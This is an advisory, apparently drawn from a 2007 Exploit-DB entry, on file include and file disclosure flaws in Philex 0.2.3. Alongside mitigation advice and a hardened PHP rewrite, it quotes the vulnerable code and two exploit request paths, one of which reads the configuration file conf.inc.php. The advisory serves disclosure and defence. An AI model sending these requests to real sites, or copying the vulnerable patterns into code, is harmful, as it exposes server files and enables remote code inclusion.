Vendor: Philex
By: GloD_M
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Disclosure/Include
CWE: 98
Product Name: Philex
Affected Version From: 2000.2.3
Affected Version To: 2000.2.3
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities

Philex 0.2.3 contains two vulnerabilities: a remote file include and a remote file disclosure. The file include is triggered by requesting header.inc.php with the CssFile parameter set to an attacker-chosen value (the advisory uses 'Shell'): the script runs `include $CssFile;` on a variable that is populated directly from the request. The file disclosure is triggered by requesting download.php with the file parameter set to 'conf.inc.php': the script passes the request parameter straight to readfile(), so any readable file, including the configuration, is returned.

Mitigation:

No vendor patch is listed. Users are advised to upgrade to a newer version of Philex if one is available, or to restrict both inputs: include only stylesheets chosen from a fixed allowlist rather than a request-controlled path, and serve downloads only from a designated directory after validating the requested file name, so that neither remote file include nor file disclosure is possible.
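An added example, not Philex's own code, showing a hardened form of the two patterns quoted in the advisory below, `include $CssFile;` and `readfile($HTTP_GET_VARS["file"]);`. The function names, the `downloads` directory and the stylesheet allowlist are assumptions:

```php
<?php
// Added example, not Philex's own code: a hardened rewrite of the two
// patterns quoted in the advisory; names, directory and allowlist are assumptions.

// Vulnerable (advisory): include $CssFile;  -- $CssFile comes straight from
// the request. Hardened: look the request value up in a fixed allowlist.
const ALLOWED_CSS = [
    'default' => 'css/default.css',
    'dark'    => 'css/dark.css',
];

function resolveCssFile(array $get): string
{
    $key = $get['CssFile'] ?? 'default';
    // Unknown keys fall back to the default instead of being included.
    return ALLOWED_CSS[$key] ?? ALLOWED_CSS['default'];
}

// Vulnerable (advisory): readfile($HTTP_GET_VARS["file"]);
// Hardened: only regular files inside one downloads directory, never PHP sources.
function resolveDownloadPath(string $requested, string $baseDir): ?string
{
    $base = realpath($baseDir);
    // basename() drops every directory component, so "../" cannot leave $base.
    $name = basename($requested);
    if ($base === false || $name === '' || $name[0] === '.') {
        return null;
    }
    if (preg_match('/\.(php|inc|phtml)$/i', $name)) {
        return null; // server-side source (e.g. conf.inc.php) is never downloadable
    }
    $full = realpath($base . DIRECTORY_SEPARATOR . $name);
    // realpath() follows symlinks; confirm the final target is still under $base.
    if ($full === false || !is_file($full)
        || strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $full;
}

// Usage in download.php: unknown or rejected names produce a 404, not the file.
$path = resolveDownloadPath($_GET['file'] ?? '', __DIR__ . '/downloads');
if ($path === null) {
    http_response_code(404);
    exit;
}
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```

In header.inc.php the include becomes `include resolveCssFile($_GET);`, so a request can only select one of the listed stylesheets.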

Exploit-DB raw data:

######################################################
# Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities
# D.Script: http://kent.dl.sourceforge.net/sourceforge/philex/philex_0.2.3.tgz
# Discovered by: GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
######################################################
# V.Code Include:                                    #
# <?include $CssFile;?>                              #
# Exploit Remote File Include:                       #
# [Path_Philex]/header.inc.php?CssFile=Shell         #
######################################################
# V.Code Disclosure:                                 #
# readfile($HTTP_GET_VARS["file"]);                  #
# Exploit Remote File Disclosure:                    #
# [Path_Philex]/download.php?file=conf.inc.php       #
######################################################

# milw0rm.com [2007-03-23]